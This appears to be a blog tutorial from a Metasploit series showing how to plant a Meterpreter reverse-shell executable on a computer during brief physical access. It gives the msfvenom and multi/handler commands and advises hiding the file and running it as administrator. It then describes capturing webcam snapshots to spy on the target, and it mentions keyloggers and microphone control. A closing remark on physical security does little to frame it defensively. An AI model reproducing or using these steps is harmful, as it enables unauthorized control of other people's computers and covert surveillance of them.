Welcome back, my aspiring cyber warriors!
Much of what we have done here in this Metasploit Basics series enables us to exploit and control a remote system anywhere on the planet earth (or at least any machine connected to the Internet on planet earth). In some cases, we may want to control a system that we temporarily have physical access to. This might be a machine in our office, in our same household, dormitory or other available location. I'm sure you can imagine many situations where this may be true, such as a state-sponsored spy gaining physical access to a sensitive computer system for just a moment in time. Or, in a more mundane application, you may want to turn that innocuous looking laptop computer into a "nanny cam" while you are out on the town. In each case, it is actually very simple and easy to embed a meterpreter payload on the system with about 30 seconds of access and a flash drive.
Many of you have written me citing Kevin Mitnick's hacking adventures in his many books. In some of these cases, Mitnick social engineers his way to physical access to a company or institution's computer systems and gains control the computer in that way. The hack I am about to demonstrate here is very similar. In addition, you might remember in the Mr Robot TV series, Angela has momentary physical access to her boss's computer system and likewise is able to get his password through the use of a Rubber Ducky and mimikatz.
In this tutorial we will be doing the same. We will create an executable file that has the meterpreter embedded within it and all we need to do to control the system is to copy the executable file to the target system and then click!
Step #1: Fire Up Kali and Open Metasploit
The first step, of course, is to fire up your Kali system and start Metasploit.
kali > msfconsole
Step #2: Build an Executable with msfvenom
Now we need to build a Windows executable file and embed the Meterpreter within it. We can do just that with msfvenom (for more on msfvenom, click here).
msf > msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.103 LPORT=4444 -f exe >malware
In this case, I have created an exe file I have called "malware". You may want to name your file something less ominous and more stealthy.
Step #3 Copy the exe to Flash Drive
Next, copy the malware.exe file to a flash drive. You can use the cp command in Linux or use the File Explorer and drag and drop the file onto the flash drive.
Step #4 Start the Handler on your Kali
Before we transfer the executable file to the target, we must start a handler in Metasploit. This is simply a TCP listener waiting for the payload to call back and connect.
msf > use multi/handler
msf > set payload windows/meterpreter/reverse_tcp
msf > set LHOST 192.168.1.103
msf > set LPORT 4444
msf> exploit
Now, this handler will wait for the malware with the embedded payload to connect back to it on port 4444.
Step #5 Copy the exe to the Target System
Next, copy the malware from the flash drive to the target system. Here I have copied it to the desktop for demonstration purposes, but to be stealthy, you will likely want to copy it to a directory that the target is not likely to open and see.
Step #5 Execute the Exe
Next, since this is an executable file, you can simply double click it to execute it. This should simultaneously start the meterpreter. Ideally, you will want to run it as administrator so that the meterpreter has system administrator privileges. To do so, you can right click and select "Run as administrator".
Step #6 Own the system!
As soon as the malware is executed on the target system, it will connect back to our Kali system and open a meterpreter on it! You now own that system!
Step #7: Post Exploitation Fun!
Now that you own the system, you can do just about anything you want. First, let's see what processes are running.
meterpreter > ps
As you can see, the malware.exe process in running on the target system. If the target were to run the Windows task manager on their system, they would see the same.
If we wanted to use that system as a nanny cam or to spy on the target, we could start the web cam. First, we need to check to see whether there is web cam.
meterpreter > webcam_list
If there is a web cam available, we can then take a snapshot by entering;
meterpreter> webcam_snap
The snapshot is saved in our /root directory. To view the snapshot, we simply need to open our browser and navigate to the file.
Now that we own the target system we can do just about anything we want! For more ideas of post exploitation see Metasploit Basics, Part 15 and see my list of meterpreter commands and scripts that you can use on the target system.
Conclusion
If you can gain physical access to nearly any system, game over! With physical access of only about 30 seconds, you can embed a meterpreter payload on the system and do just about anything you want with the system including controlling the microphone, the web cam and even embed a keylogger. Hopefully, this demonstrates one of the most important but overlooked tenants of information security, physical security.